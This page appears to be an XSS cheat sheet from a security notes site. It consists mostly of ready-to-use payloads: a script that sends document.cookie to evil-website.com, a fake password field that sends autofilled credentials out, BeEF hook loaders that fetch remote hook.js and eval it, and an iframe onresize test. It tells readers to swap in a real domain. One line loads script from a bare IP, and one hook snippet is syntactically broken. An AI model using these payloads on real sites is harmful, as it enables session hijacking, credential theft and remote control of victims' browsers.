GitHub

XSS

LogoCross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security AcademyWebSecAcademy

HTML Context

<script>alert(document.cookie)</script>
<img src=x onerror=alert(document.cookie)>

XSS Exploit

Steal Cookie

Replace evil-website.com in the code with the actual domain

<script>
fetch("https://evil-website.com", {
  method: "POST",
  mode: "no-cors",
  body: JSON.stringify({ cookie: document.cookie }),
});
</script>

Steal Password

  • Only for users who have enabled autofill passwords

  • Replace evil-website.com in the code with the actual domain

<input name="username" id="username" />
<input
    name="password"
    id="password"
    type="password"
    onchange="if(this.value.length); fetch('https://evil-website.com',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});"
/>

Hook Browser (beef)

<script src="47.106.10.108"></script>
<body
    onload="fetch('http://evil-website.com:3000/hook.js')
        .then(response => response.text())
        .then(script => eval(script))"
        .catch(error => console.error('Error:', error));
>

<body
    onload="
        fetch('http://evilwebsite:3000/hook.js')
            .then(function(response) {
                return response.text();
            })
            .then(function(script) {
                eval(script);
            })
    "
>
<body
    onload="
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'http://evil-website.com:3000/hook.js', true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState == 4 && xhr.status == 200)
            eval(xhr.responseText);
    };
    xhr.send();
"
>

Experiment

onresize event (GET)

  • You need to start an HTTP service for the victim to access

  • Replace vulnerable-website.com in the code with the actual domain

  • Replace <xss-parameter> in the code with the actual parameter.

  • Replace <%3Cbody%20onresize=%22print()%22%3E> in the code with the actual payload.

    • The decoded value is x <body onresize="print()">

<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />

<iframe
    src="https://vulnerable-website.com/?<xss-parameter>=<%3Cbody%20onresize=%22print()%22%3E>"
    onload="this.style.width='0'; this.style.height='0'"
></iframe>
上一页27017 - MongoDB下一页Awesomeness

最后更新于